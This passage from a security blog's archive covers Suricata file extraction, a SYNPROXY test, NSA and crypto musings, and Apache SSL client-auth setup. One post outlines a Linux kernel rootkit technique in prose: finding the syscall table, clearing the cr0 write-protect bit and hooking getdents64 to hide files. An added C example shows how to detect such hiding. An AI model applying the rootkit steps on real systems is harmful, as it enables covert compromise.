alert http any any -> any any (msg:"FILESTORE jpg"; fileext:"jpg"; filestore; sid:6; rev:1;)<br />
<br />
Enable the eth1:<br />
#ifconfig eth1 up<br />
<br />
According to the Suricata wiki, we should turn off the NIC offloading features( TSO, GRO, LRO, GSO, etc) on the capture interface:<br />
ethtool -K eth1 tso off<br />
ethtool -K eth1 gro off<br />
ethtool -K eth1 lro off<br />
ethtool -K eth1 gso off<br />
ethtool -K eth1 rx off<br />
ethtool -K eth1 tx off<br />
ethtool -K eth1 sg off<br />
ethtool -K eth1 rxvlan off<br />
ethtool -K eth1 txvlan off<br />
ethtool -N eth1 rx-flow-hash udp4 sdfn<br />
ethtool -N eth1 rx-flow-hash udp6 sdfn<br />
ethtool -n eth1 rx-flow-hash udp6<br />
ethtool -n eth1 rx-flow-hash udp4<br />
ethtool -C eth1 rx-usecs 1000<br />
ethtool -C eth1 adaptive-rx off<br />
<br />
Run the Suricata with this command:<br />
/usr/local/suricata/bin/suricata -c /usr/local/suricata/etc/suricata/suricata.yaml -i eth1<br />
<br />
Use your firefox/chrome on your host machine, and visit some website, like <a href="http://image.baidu.com/i?ct=503316480&tn=baiduimagedetail&statnum=girl&ipn=d&cg=girl&word=%E7%BE%8E%E5%A5%B3%20%E4%B8%8D%E5%90%8C%E9%A3%8E%E6%A0%BC%20%E6%80%A7%E6%84%9F%20&ie=utf-8&in=3354&cl=2&lm=-1&st=&pn=6&rn=1&di=&ln=1998&&fmq=1378374347070_R&ic=&s=&se=&sme=0&tab=&face=&&is=0,1505379&istype=&ist=&jit=&objurl=http%3A%2F%2Fimage.tianjimedia.com%2FuploadImages%2F2011%2F360%2F6955G4EI49W6.jpg#pn6&0&di&objURLhttp%3A%2F%2Fimage.tianjimedia.com%2FuploadImages%2F2011%2F360%2F6955G4EI49W6.jpg&fromURLhttp%3A%2F%2Fpic.yesky.com%2F77%2F30963577_3.shtml&W850&H566&T&S&TP0" target="_blank">this</a>.<br />
<br />
You should see some girl pictures in /var/log/suricata/files ;-)<br />
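Once files land in the store, the next question is which of them deserve a look. This is an added example of mine (not code from the Suricata project) that reads the files-json.log output enabled above and flags stored files whose libmagic type contradicts their extension or marks them as executables or archives, then maps each hit to the file.&lt;id&gt; path Suricata writes under log-dir. The log lines are constructed; the field names (id, srcip, dstip, sp, dp, http_host, http_uri, filename, magic, md5, stored, size) follow the 2.0-era files-json format as I remember it, so check them against your own log. One practical caveat: magic and md5 only appear for files a rule asked them for unless force-magic/force-md5 are set to yes, which the config above leaves at no; without magic, the mismatch check below has nothing to compare.

```python
import json
import os

# Constructed files-json.log content (field names assumed to match the
# Suricata 2.0 file-log output; verify against your own log). Hashes and
# addresses are made up.
SAMPLE_LOG = "\n".join([
    json.dumps({"id": 1, "timestamp": "03/31/2014-18:20:01.000001", "ipver": 4,
                "srcip": "203.0.113.10", "dstip": "192.0.2.5", "protocol": 6,
                "sp": 80, "dp": 49152, "http_host": "img.example.test",
                "http_uri": "/photos/6955G4EI49W6.jpg",
                "filename": "6955G4EI49W6.jpg",
                "magic": "JPEG image data, JFIF standard 1.01",
                "state": "CLOSED", "md5": "11111111111111111111111111111111",
                "stored": True, "size": 48213}),
    json.dumps({"id": 2, "timestamp": "03/31/2014-18:20:03.000001", "ipver": 4,
                "srcip": "203.0.113.77", "dstip": "192.0.2.5", "protocol": 6,
                "sp": 80, "dp": 49153, "http_host": "cdn.example.test",
                "http_uri": "/assets/logo.jpg", "filename": "logo.jpg",
                "magic": "PE32 executable (GUI) Intel 80386, for MS Windows",
                "state": "CLOSED", "md5": "22222222222222222222222222222222",
                "stored": True, "size": 90112}),
    json.dumps({"id": 3, "timestamp": "03/31/2014-18:20:05.000001", "ipver": 4,
                "srcip": "203.0.113.10", "dstip": "192.0.2.5", "protocol": 6,
                "sp": 80, "dp": 49154, "http_host": "docs.example.test",
                "http_uri": "/manual.pdf", "filename": "manual.pdf",
                "magic": "PDF document, version 1.4", "state": "CLOSED",
                "md5": "33333333333333333333333333333333",
                "stored": True, "size": 120001}),
    json.dumps({"id": 4, "timestamp": "03/31/2014-18:20:09.000001", "ipver": 4,
                "srcip": "203.0.113.99", "dstip": "192.0.2.5", "protocol": 6,
                "sp": 80, "dp": 49155, "http_host": "cdn.example.test",
                "http_uri": "/update.bin", "filename": "update.bin",
                "magic": "data", "state": "TRUNCATED", "stored": False,
                "size": 1024}),
])

EXPECTED_MAGIC = {          # extension -> fragment libmagic should report
    ".jpg": "JPEG", ".jpeg": "JPEG", ".png": "PNG", ".gif": "GIF",
    ".pdf": "PDF", ".zip": "Zip",
}
EXECUTABLE_MAGIC = ("PE32", "MS-DOS executable", "ELF", "Mach-O",
                    "Java archive", "shell script", "Zip archive")


def parse_file_log(text: str) -> list:
    """One JSON object per line; blank lines are skipped."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def stored_path(entry: dict, log_dir: str) -> str:
    """Suricata names extracted files file.<id> under file-store's log-dir
    (assumed layout; a file.<id>.meta sidecar carries the same fields)."""
    return os.path.join(log_dir, "file.%d" % entry["id"])


def triage(entries: list, log_dir: str = "/var/log/suricata/files") -> list:
    """Return one record per stored file whose content type looks wrong."""
    findings = []
    for entry in entries:
        if not entry.get("stored"):
            continue                    # nothing on disk to look at
        name = (entry.get("filename") or "").lower()
        ext = os.path.splitext(name)[1]
        magic = entry.get("magic") or ""
        reasons = []
        if ext in EXPECTED_MAGIC and magic and EXPECTED_MAGIC[ext] not in magic:
            reasons.append("extension %s but magic %r" % (ext, magic))
        if any(tag in magic for tag in EXECUTABLE_MAGIC):
            reasons.append("executable or archive content")
        if reasons:
            findings.append({
                "id": entry["id"],
                "path": stored_path(entry, log_dir),
                "md5": entry.get("md5"),
                "source": "%s:%s" % (entry.get("srcip"), entry.get("sp")),
                "url": "http://%s%s" % (entry.get("http_host"), entry.get("http_uri")),
                "reasons": reasons,
            })
    return findings


if __name__ == "__main__":
    for hit in triage(parse_file_log(SAMPLE_LOG)):
        print("file id %d (%s) from %s" % (hit["id"], hit["path"], hit["url"]))
        for reason in hit["reasons"]:
            print("   -", reason)
```

Pointing it at the real log is a matter of reading /var/log/suricata/files-json.log instead of SAMPLE_LOG; the md5 field, once force-md5 is on, is what you feed to a sample repository to see whether the file has been seen before.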
<br />
btw: Thanks to the Suricata community for bringing us this fuc*ing awesome IDS/IPS project. Special thanks to Peter Manev.<br />
<br />
<span style="font-size: large;"><b>SYNPROXY: the great DoS mitigation solution</b></span> (2014-03-19)<br />
I don't expect to see a perfect DoS solution in my lifetime;-) As we know, there are tons of commercial gateway-level boxes that can mitigate DoS attacks in some ways. But I prefer the combination of x86+GNU/Linux, like most old school guys. Why? My answer is simple: it's the fuc*ing cheapest solution we have. <a href="http://lwn.net/Articles/563151/" target="_blank">SYNPROXY</a> is one of the new features of Linux kernel 3.13. It's based on the netfilter framework and connection tracking. If I understand correctly, the initial SYN packet is marked UNTRACKED and redirected into the iptables target "SYNPROXY"( like ACCEPT, DROP, NFQUEUE, etc). SYNPROXY then acts like a network gateway device( router?), performing the regular TCP three-way handshake itself. The original packets are passed on to the destination only once the handshake has finished. The contributor Jesper Dangaard Brouer gave a free talk at DevConf last month. According to the test results in <a href="http://people.netfilter.org/hawk/presentations/devconf2014/iptables-ddos-mitigation_JesperBrouer.pdf" target="_blank">his slides</a>, the numbers look really good. I did a little test with my colleague today.<br />
<br />
Platform: Debian, SLES-12-beta2<br />
Hardware: Laptop, Server, 100Mbps Switch<br />
Tools: hping3, metasploit<br />
<br />
root@d6-test:/home/shawn# iptables -t raw -A PREROUTING -i eth0 -p tcp --dport 8888 --syn -j NOTRACK<br />
root@d6-test:/home/shawn# iptables -A INPUT -i eth0 -p tcp --dport 8888 -m state --state UNTRACKED,INVALID -j SYNPROXY --sack-perm --timestamp --mss 1480 --wscale 7 --ecn<br />
echo 0 > /proc/sys/net/netfilter/nf_conntrack_tcp_loose<br />
<br />
Result:<br />
Without SYNPROXY: ksoftirq is around 8%-9%<br />
With SYNPROXY: ksoftirq is less than 3%<br />
<br />
btw: This result may not be very accurate. Anyway, SYNPROXY works.Anonymoushttp://www.blogger.com/profile/13974563038012930535noreply@blogger.com0tag:blogger.com,1999:blog-35345954.post-50639666561243093232014-02-06T18:13:00.000+08:002014-02-06T18:13:30.048+08:00Simple linux rootkit on Debian with kernel 3.13I've wasted a lot of time in 2013. I always found some shitty excuses, like "I'm fucking busy recently", to delay my hacking journey into kernel rootkits. This was supposed to be done a couple of months ago. Thank L0rd! I found a slot during the Chinese new year vacation at my hometown and began the adventure of rootkit hacking. I've read a bunch of great Phrack papers from the good old hacking days. They're old but they help.<br /><br />---------------------------------------------------------------<br />[Weakening the Linux Kernel, Phrack Magazine Volume 8, Issue 52<br />January 26, 1998, article 18 of 20]<br />http://www.phrack.org/issues.html?issue=52&id=18&mode=txt<br /><br />[Advances in Kernel Hacking, Volume 0x0b, Issue 58, Phile #0x06 of<br />0x0e]<br />http://www.phrack.org/issues.html?issue=58&id=6&mode=txt<br /><br />[Handling Interrupt Descriptor Table for fun and profit, Volume 0x0b,<br />Issue 59, Phile #0x04 of 0x12]<br />http://www.phrack.org/issues.html?issue=59&id=4&mode=txt<br /><br />[Kernel Rootkit Experiences, Volume 0x0b, Issue 61, Phile 0x0e of<br />0x0f]<br />http://www.phrack.org/issues.html?issue=61&id=14&mode=txt<br /><br />[Mystifying the debugger, Volume 0x0c, Issue 65, Phile #0x08 of<br />0x0f]<br />http://www.phrack.org/issues.html?issue=65&id=8&mode=txt<br /><br />Special thanks to THC's paper, which was released in 1999:<br />[Complete Linux Loadable Kernel Modules]<br />https://www.thc.org/papers/LKM_HACKING.html<br />---------------------------------------------------------------<br /><br />I wrote a simple rootkit that can only hide a specific file. 
Just a<br />few old school steps make this feature possible:<br /><br />Firstly, we need to retrieve the system call table. But it's no longer<br />exported since 2.6. Fortunately, a few system calls are still<br />exported. sys_close() is one of them:<br />--------------------------------------<br />root@d6-test:/home/shawn# grep sys_close /boot/System.map-3.13.0<br />c10e0aa1 T sys_close<br />c140fdc4 R __ksymtab_sys_close<br />c141815c r __kcrctab_sys_close<br />c1420e33 r __kstrtab_sys_close<br />--------------------------------------<br /><br />I used a brute force way to locate the table through that system call. I learned it from<br />memset's blog:<br />https://memset.wordpress.com/2011/03/18/syscall-hijacking-dynamically-obtain-syscall-table-address-kernel-2-6-x-2/<br /><br />The start mem addr would be 0xc0000000; then it tries address after address<br />until it locates the one holding sys_close()'s addr.<br /><br />Then, the write protection bit in cr0 has to be cleared. The WP bit is<br />bit 16 of the cr0 register:<br /><br />31 30 29 28 19 18 17 16 15 6 5 4 3 2 1 0<br />+----------------------------------------------------------------------+<br />|PG|CD |NW|-----------------|AM|---|WP|--------------|NE|ET|TS|EM|MP|PE|<br />+----------------------------------------------------------------------+<br /><br />After we've done the above steps, we are able to hijack the system call we<br />want. Here I choose to hijack getdents64(). Why? Because all I wanna<br />do is hide a specific file from "ls". 
Let's see what "ls" would<br />usually do:<br />------------------------------------------<br />// begin.........<br />execve("/bin/ls", ["ls"], [/* 16 vars */]) = 0<br />brk(0) = 0x8366000<br />access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)<br />mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7791000<br />access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)<br />open("/etc/ld.so.cache", O_RDONLY) = 3<br />fstat64(3, {st_mode=S_IFREG|0644, st_size=19346, ...}) = 0<br />.......................<br />.......................<br />.......................<br />// look, that's it<br />getdents64(3, /* 17 entries */, 32768) = 544<br />getdents64(3, /* 0 entries */, 32768) = 0<br />close(3) = 0<br />fstat64(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 2), ...}) = 0<br />mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7790000<br />.......................<br />// then it writes them to standard out (fd 1)<br />write(1, "a.out dirent.c dirent.c~ insi"..., 107a.out dirent.c dirent.c~ insight-lab libmnl libnftables linux-3.13 linux-3.13.tar my_tmp nftables<br />) = 107<br />.......................<br />------------------------------------------<br /><br />The only kernel struct we have to deal with is: <br />-------------------------------------------------------------------<br /> struct linux_dirent {<br /> unsigned long d_ino; /* Inode number */<br /> unsigned long d_off; /* Offset to next linux_dirent */<br /> unsigned short d_reclen; /* Length of this linux_dirent */<br /> char d_name[]; /* Filename (null-terminated) */<br /> /* length is actually (d_reclen - 2 -<br /> offsetof(struct linux_dirent, d_name) */<br /> /*<br /> char pad; // Zero padding byte<br /> char d_type; // File type (only since Linux 2.6.4;<br /> // offset is (d_reclen - 1))<br /> */<br /><br /> }<br />-------------------------------------------------------------------<br /><br />d_reclen is the size of the current linux_dirent64 record, and it matters. Plz<br />read the<a href="https://github.com/citypw/citypw-SCFE/blob/master/security/rootkit/hide_file/hide_file.c" target="_blank"> fucking source code</a> for any detail! Well, like in the good old days, I drew an ascii <a href="https://raw.github.com/citypw/citypw-SCFE/master/security/rootkit/hide_file/README" target="_blank">big picture</a> here.<br />
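As an added example that is not the post's hide_file.c, here is the other side of the same structure: a userland walker over the raw getdents64 buffer that follows the d_reclen chain described above, plus the old link-count check defenders use to notice a subdirectory that a hooked getdents64 has stopped listing. The struct definition, the function names and the /tmp sample directory are mine, not the post's.

```c
/* Added example, not the blog's hide_file.c: walk a directory through the raw
 * getdents64(2) syscall the way ls does, following the d_reclen chain, then
 * apply the old link-count trick that exposes subdirectories a hooked
 * getdents64 no longer reports. Linux only. */
#define _GNU_SOURCE
#include <dirent.h>
#include <fcntl.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <unistd.h>

struct linux_dirent64 {      /* record layout the kernel writes for getdents64 */
    uint64_t       d_ino;    /* inode number */
    int64_t        d_off;    /* cookie for the next record */
    unsigned short d_reclen; /* total size of this record, name + NUL included */
    unsigned char  d_type;   /* DT_* type, DT_UNKNOWN on some filesystems */
    char           d_name[]; /* NUL-terminated file name */
};

/* Walk every record for `path`. Returns the number of entries including "."
 * and "..", or -1 on error. If `subdirs` is non-NULL it receives the number
 * of subdirectories other than "." and "..". */
int count_entries_raw(const char *path, int *subdirs)
{
    char buf[32768];                        /* same size ls asks for above */
    int fd = open(path, O_RDONLY | O_DIRECTORY);
    if (fd < 0) return -1;
    int entries = 0, dirs = 0;
    for (;;) {
        long n = syscall(SYS_getdents64, fd, buf, sizeof buf);
        if (n < 0) { close(fd); return -1; }
        if (n == 0) break;                  /* end of directory */
        for (long pos = 0; pos < n; ) {
            struct linux_dirent64 *d = (struct linux_dirent64 *)(buf + pos);
            /* a bogus d_reclen would walk us off the end of the buffer */
            if ((size_t)d->d_reclen <= offsetof(struct linux_dirent64, d_name) ||
                pos + d->d_reclen > n) { close(fd); return -1; }
            entries++;
            unsigned char type = d->d_type;
            if (type == DT_UNKNOWN) {       /* no type from the fs: lstat it */
                struct stat st;
                if (fstatat(fd, d->d_name, &st, AT_SYMLINK_NOFOLLOW) == 0 &&
                    S_ISDIR(st.st_mode))
                    type = DT_DIR;
            }
            if (type == DT_DIR && strcmp(d->d_name, ".") && strcmp(d->d_name, ".."))
                dirs++;
            pos += d->d_reclen;             /* d_reclen chains the records */
        }
    }
    close(fd);
    if (subdirs) *subdirs = dirs;
    return entries;
}

int count_subdirs_raw(const char *path)
{
    int s = 0;
    return count_entries_raw(path, &s) < 0 ? -1 : s;
}

/* On ext4/tmpfs-style filesystems a directory has st_nlink == 2 + number of
 * subdirectories. A hooked getdents64 that drops a subdirectory leaves the
 * link count untouched, so a positive result means the listing is missing
 * something. Returns -1 where the invariant does not hold (st_nlink < 2,
 * e.g. btrfs) or on error. */
int hidden_subdirs_suspected(const char *path)
{
    struct stat st;
    int subdirs;
    if (stat(path, &st) != 0 || st.st_nlink < 2) return -1;
    if (count_entries_raw(path, &subdirs) < 0) return -1;
    return (int)st.st_nlink - 2 - subdirs;
}

/* Constructed sample input: a throwaway /tmp directory with two files and
 * one subdirectory. Returns its path (static storage) or NULL on failure. */
const char *make_sample_dir(void)
{
    static char dir[64];
    char tmpl[] = "/tmp/dirent_demo_XXXXXX", p[96];
    const char *names[] = { "sub", "a.txt", "b.txt" };
    if (!mkdtemp(tmpl)) return NULL;
    strcpy(dir, tmpl);
    for (int i = 0; i < 3; i++) {
        snprintf(p, sizeof p, "%s/%s", dir, names[i]);
        if (i == 0) mkdir(p, 0700);
        else close(open(p, O_WRONLY | O_CREAT, 0600));
    }
    return dir;
}
```

Run count_entries_raw() against a directory listed by a stock ls and the two counts agree; run hidden_subdirs_suspected() on a tree where the link count and the visible subdirectories disagree and you have a lead worth chasing.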
<br />
May the L0rd's hacking spirit guide us!!!Anonymoushttp://www.blogger.com/profile/13974563038012930535noreply@blogger.com1tag:blogger.com,1999:blog-35345954.post-89785618237084071522013-12-25T00:49:00.002+08:002013-12-25T00:49:23.924+08:00Life was never easy...especially in post-prism era;-)I've watched a great free speech today:<br />
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/zdUx4hqxKRw?feature=player_embedded' frameborder='0'></iframe></div>
<br />
Bruce Schneier, our great philosopher in the cybersec field. And Eben Moglen, afaik, is a great hacker( not in computer stuff) in the <span style="color: lime;">free software</span> law field. I do remember I used to listen to Eben's free speeches( electronic version) when I was in college. Seven years on, I know better why a group of people has been trying to fight for digital rights, software freedom, etc.....<br />
<br />
I'm here to share something I've learned from Bruce and Eben today. This writeup is going to be my notes and some personal summary of 2013. It may be a little bit messy;-)<br /><br />What do we learn from Mr Snowden's disclosures about crypto?<br />
------------------------------------------------------------------<br />Cryptography itself is still hard to break. <span style="color: red;">NSA</span> is not breaking the math, but breaking by cheating: by stealing private keys, by forging certificates, by doing non-crypto stuff to achieve their *dirty* goals. Even in the fucked-up case of Google, NSA didn't crack the traffic between the user's browser and Google's server, because Google uses client auth SSL by default and, more importantly, it works( NSA doesn't like it). But NSA hijacked the traffic between Google's data centers, where SSL/TLS was removed for whatever reason( cost?). Crypto is still one of the best ways to fight NSA or NSA-like organizations.<br /><br /><br />Tor stories?<br />
------------------------------------------------------------------<br />Personally, I like Tor. It could probably save people's lives in some "restricted" areas. Tor pisses off agencies like NSA. The contributors of the Tor project have routine seminars, and it seems that discussing how to break Tor is their daily bread;-) Thanks to the Tor project contributors.<br /><br />What if NSA is in our threat model?<br />
------------------------------------------------------------------<br />The 1st thing is mitigation: NSA has a piece of math but still needs a bunch of engineers to make it work. Make NSA pay a higher cost( time budget, not new math). Plz use proper crypto technology( on a GNU/Linux distro) as much as possible. It's reasonable to speculate that NSA has something about crypto that we don't. Information asymmetry does exist. Of course NSA has known what we do for the past decades, but we rarely get to know what NSA has been doing in the same period..so thanks to Mr Snowden, whose disclosures gave us *a little more* information. <br /><br />And NSA-like organizations definitely need a lot of automated attack tools: FOXACID? The reason is simple: you can't just train people off the street to become old school hackers in a few months. That's why they have to develop automated tools.<br /><br />btw: What does old school hacker mean in my context? A type of people who are highly skilled with low-level techniques, such as *NIX systems, networking( both internet stuff and the core network of telcos), reversing, cryptography, C/ASM code audit, etc..and who also have a specific type of strong philosophy with underground spirit;-)....ug spirit~wth<br /><br />Standard corruption?<br />
------------------------------------------------------------------<br />It's not that every standard has a security problem. Bruce thinks AES is still secure. We can't blame only the Dual EC stuff on faults in the standards process. Implementation is important; for instance the non-NSA-involved international cellphone standard was fucked up..A5/1? Ring a bell? We should only trust those public standards that our guys( free software enthusiasts, cybersec philosophical anarchists like the Phrack guys? or people like Bruce?:)) are getting involved with.<br /><br />What tools can we trust?<br />
------------------------------------------------------------------<br />GnuPG, Tor, OTR, etc... Some of these open source tools are written by security/crypto paranoids. They have a very awesome design and implementation.<br /><br />What if you are on the target list of an NSA-like organization?<br />
------------------------------------------------------------------<br />If you are targeted, there's nothing you can do at that level. Is this super-APT shit?<br /><br />Is the cyberwar going to end?<br />
------------------------------------------------------------------<br />I don't think so. If everyone holds the philosophy of "I'll fuck you if you don't fuck me first, sir", then the whole scene turns into everybody being fucked by everybody. That's what old school hackers have been through in the paradigm shift( painfully?) from the good old hacking days to "This is cyber, sir!".<br /><br />Does that sound like we are hopeless?<br />
------------------------------------------------------------------<br />Nope, quoted from Bruce:"Society improves because people dare to think the unthinkable and then after 20, 30 years everyone says that was kind of good idea. It takes a while but it has to start."<br />
<br />
<br />
FOSS solutions?<br />
------------------------------------------------------------------ <br />
Bruce thinks open source solutions are more secure than closed ones. Because:<br />1, You can look at it( source code)<br />2, It's harder for someone to slip something in<br /><br />We probably don't need to worry too much( did I say "too much"?) about NSA was/is/will be trying to put backdoors in some fundamental free software projects, like the Linux kernel, GCC, Glibc, the "supposed to be re-written" openssl;-) etc. Because according to the fully disclosed documents, NSA seems amazingly risk averse. They only want to take a safe path. Yeah..yeah, I know what they're thinking...you can do evil, but don't get caught;-) The free/open source community has a lot of old school hackers who have been doing code review for decades. They did a great job. And they are going to continue this *secret* war against NSA-like organizations. So it's not an easy attack( backdooring) on a compiler.....( and, there are tons of guys like me who are trying to be old school hackers).<br /><br />Leap of faith?<br />
------------------------------------------------------------------<br />Yeah, it sounds perfect. But no one can ensure you are 100% secure, and the fact is that you can't examine everything. You must trust them( the tools you use). Give yourself a little faith. Did Søren Kierkegaard say that we could feel comfortable using GCC;-)<br /><br />Well, using Apple products( iphone, ipad, ishit) and Microsoft products( Win as a gaming platform, Office for whatever) is not a good option. Drop them, come on!<br /><br />
Hardware box issues: never updated against fully disclosed vulns:<br />
------------------------------------------------------------------<br />In some countries, the cybersec business couldn't support small businesses. The reason that happened is that most customers had/have the wrong concept of cybersec. They think the only thing you need to do is<br />buy a bunch of hardware boxes( firewall, IDS/IPS, UTM, NGFW, or whatever). Obviously, that violates the very important old school principles:<br />------------------------------------------------------------------<br />Security is NOT:<br /><br />Security is NOT installing a firewall ..<br />Security is NOT a Product or Service .. ( by Schneier, Bruce )<br />Security is Not a Product; It's a Process .. ( by Schneier, Bruce )<br />A Security Audit is NOT "running a port scan and turning things off" ..<br /><br /><br />Security is:<br /><br />Security is "Can you still continue to work productively/safely, without compounding the security breach"<br />Security is only as good as your "weakest link"<br />Security is "risk management" of your corporate resources(computers/people), required expertise, time management, implementation costs, data backup/recovery procedures ...<br />Security is a Process, Methodology, Costs, Policies and People<br />Security is "Can somebody physically walk out with your computers,<br />disks, tapes, .. "<br />Security is 24x7x365 ... constantly ongoing .. never ending<br />Security is "learn all you can as fast as you can, without negatively<br />affecting the network, productivity and budget"<br />------------------------------------------------------------------<br /><br />In the past few years, more and more enterprise management guys have been realizing that those hardware boxes can't solve the problem they were supposed to solve.* Right here, there's one thing you might want to know: some "sec box" vendors have been using a lot of open source code( linux kernel, snort, l7, BRO, etc) but they never contribute back to the community. 
*........Personally I do believe that only old school cybersec principles can make a system secure. But it needs skilled people to do a lot of work in the daily cybersec process. Well, the mainstream marketing still advertising the *boxes* solution is one thing, while it being hard to find old school guys is another.<br />
<br />What I'm trying to say is not that hardware boxes are unimportant. But people can also do small business by trying to find cheap and effective solutions. That's where open source cybersec solutions fit in. There are a lot of great cybersec open source projects. All you have to do is pay someone who knows<br />this cybersec open source code and combine them into your own cybersec solution. For example, a customer wants to harden their network and servers. There are a lot of open source sec projects that can do that, such as<br />iptables/snort/psad/tcpwrapper/apparmor/openssl/apache or web-level<br />hardening stuff( inside Django for preventing SQL injection, mod_security, etc). But the customer would pay someone who knows about it to consult for<br />them. The skilled guy could train the customer's IT guys or go through<br />the implementation themselves. Personally, I think it's the best way to do<br />cybersec small business. It's a win-win solution! Old school guys get<br />paid and customers are happy.<br />
<br />
btw: Some regions may have this cybersec small business model already.<br />--------------------------------------------------------------------------<br />
<br />
Well, it's Christmas today. As a Neo-Calvinist, I wouldn't talk about religion too much in my daily life. But all in all, a neo-calvinist is a Christian indeed. I'm not too religious. Sometimes, I really hate those nominal christians who feel so good doing terrible things in the name of god....fuc* them....Anyway, a hacker is a type of person who is willing to seek the truth no matter the cost. Even if I see L0rd Jesus looking like the overmind( from starcraft) after I die, the problem to me would be "Is it true my L0rd looks like the overmind?"; if he is the L0rd, whatever he looks like, I'd still worship him;-)<br />
<br />
Hacker can pick the <span style="color: red;">red</span> pill.<br />
Hacker can destroy the <span style="color: blue;">blue</span> pill.<br />
Hacker can embrace the <span style="color: #ffd966;">desert</span> of the real.<br />
<br />
Merry Christmas, my fellow brothers/sisters!<br />
<br />
<span style="color: lime;">May L0rd's hacking spirit guide us in 2014!!! </span>Anonymoushttp://www.blogger.com/profile/13974563038012930535noreply@blogger.com0tag:blogger.com,1999:blog-35345954.post-90304639295522600852013-11-27T19:25:00.000+08:002013-11-27T20:15:14.644+08:00How to set up apache2 with SSL/TLS support and client auth on Debian 7.2I think SSL/TLS should be part of the security hardening process. Only fools would not use cryptography in the post-prism era. I think what Mr Snowden did proved one thing: Richard Stallman and the Phrack guys( I prefer to use the term "<span style="color: lime;">philosophical anarchist</span>") never lied to us;-) Well, I don't wanna bullshit about this controversial topic here...let's see how we can set up an HTTPS server with client auth.<br />
<br />
<span style="color: lime;">Generate CA certificates</span>:<br />
--------------------------------------------------------------------------------<br />
root@d6-test:/opt/ssl# <b>cp /usr/lib/ssl/misc/CA.sh .</b><br />
root@d6-test:/opt/ssl# <b>./CA.sh -newca</b><br />
CA certificate filename (or enter to create)<br />
<br />
Making CA certificate ...<br />
Generating a 2048 bit RSA private key<br />
..................................+++<br />
..............................................+++<br />
writing new private key to './demoCA/private/./cakey.pem'<br />
.............................................<br />
.............................................<br />
Country Name (2 letter code) [AU]:CN<br />
State or Province Name (full name) [Some-State]:Shanghai<br />
Locality Name (eg, city) []:Shanghai<br />
Organization Name (eg, company) [Internet Widgits Pty Ltd]:MOT<br />
Organizational Unit Name (eg, section) []:MOT<br />
Common Name (e.g. server FQDN or YOUR name) []:<span style="color: red;">hardened-shit</span><br />
Email Address []:info@hardened-shit.com<br />
<br />
Please enter the following 'extra' attributes<br />
to be sent with your certificate request<br />
A challenge password []:<br />
An optional company name []:<br />
Using configuration from /usr/lib/ssl/openssl.cnf<br />
Enter pass phrase for ./demoCA/private/./cakey.pem:<br />
Check that the request matches the signature<br />
Signature ok<br />
Certificate Details:<br />
Serial Number:<br />
c0:81:0e:bc:52:d0:19:5a<br />
Validity<br />
Not Before: Nov 19 02:08:14 2013 GMT<br />
Not After : Nov 18 02:08:14 2016 GMT<br />
Subject:<br />
countryName = CN<br />
stateOrProvinceName = Shanghai<br />
organizationName = MOT<br />
organizationalUnitName = MOT<br />
commonName = hardened-shit<br />
emailAddress = info@hardened-shit.com<br />
X509v3 extensions:<br />
X509v3 Subject Key Identifier: <br />
D5:38:4C:2F:FE:CF:E5:19:E9:AC:C5:03:6E:81:6A:D9:15:8F:A8:63<br />
X509v3 Authority Key Identifier: <br />
keyid:D5:38:4C:2F:FE:CF:E5:19:E9:AC:C5:03:6E:81:6A:D9:15:8F:A8:63<br />
<br />
X509v3 Basic Constraints: <br />
CA:TRUE<br />
Certificate is to be certified until Nov 18 02:08:14 2016 GMT (1095 days)<br />
<br />
Write out database with 1 new entries<br />
Data Base Updated<br />
--------------------------------------------------------------------------------<br />
<br />
<span style="color: lime;">Copy intermediate key and certificate</span>:<br />
--------------------------------------------------------------------------------<br />
root@d6-test:/opt/ssl#<b> cp demoCA/private/cakey.pem ca.key</b><br />
root@d6-test:/opt/ssl# <br />
root@d6-test:/opt/ssl# <b>cp demoCA/cacert.pem ca.crt</b><br />
--------------------------------------------------------------------------------<br />
<br />
<span style="color: lime;">Generate server key</span>:<br />
--------------------------------------------------------------------------------<br />
root@d6-test:/opt/ssl# <b>openssl genrsa -des3 -out server.key 2048</b><br />
Generating RSA private key, 2048 bit long modulus<br />
...+++<br />
.................+++<br />
e is 65537 (0x10001)<br />
Enter pass phrase for server.key:<br />
Verifying - Enter pass phrase for server.key:<br />
--------------------------------------------------------------------------------<br />
<br />
<span style="color: lime;">Generate server CSR(Certificate Signing Request) with server key</span>:<br />
--------------------------------------------------------------------------------<br />
root@d6-test:/opt/ssl# <b>openssl req -new -key server.key -out server.csr</b><br />
...........................................<br />
........................................<br />
-----<br />
Country Name (2 letter code) [AU]:CN<br />
State or Province Name (full name) [Some-State]:Shanghai<br />
Locality Name (eg, city) []:Shanghai<br />
Organization Name (eg, company) [Internet Widgits Pty Ltd]:MOT<br />
Organizational Unit Name (eg, section) []:MOT<br />
Common Name (e.g. server FQDN or YOUR name) []:<span style="color: red;">hardened-shit</span><br />
Email Address []:info@hardened-shit.com<br />
<br />
Please enter the following 'extra' attributes<br />
to be sent with your certificate request<br />
A challenge password []:<br />
An optional company name []:<br />
--------------------------------------------------------------------------------<br />
<br />
<span style="color: lime;">Generate server certificate</span>:<br />
--------------------------------------------------------------------------------<br />
root@d6-test:/opt/ssl# <b>openssl req -x509 -days 2048 -key server.key -in server.csr > server.crt</b><br />
Enter pass phrase for server.key<br />
--------------------------------------------------------------------------------<br />
<br />
<span style="color: lime;">You can check out the cert or verify it( note that openssl req -x509 above produced a self-signed server.crt, so the verify against ca.crt only passes for a cert actually signed by that CA):</span><br />
<b>openssl x509 -noout -text -in server.crt<br />openssl verify -CAfile ca.crt server.crt </b><br />
<br />
<span style="color: lime;">Generate client's key</span>:<br />
--------------------------------------------------------------------------------<br />
root@d6-test:/opt/ssl# <b>openssl genrsa -des3 -out client.key 2048</b><br />
Generating RSA private key, 2048 bit long modulus<br />
..........................................................................................................................................+++<br />
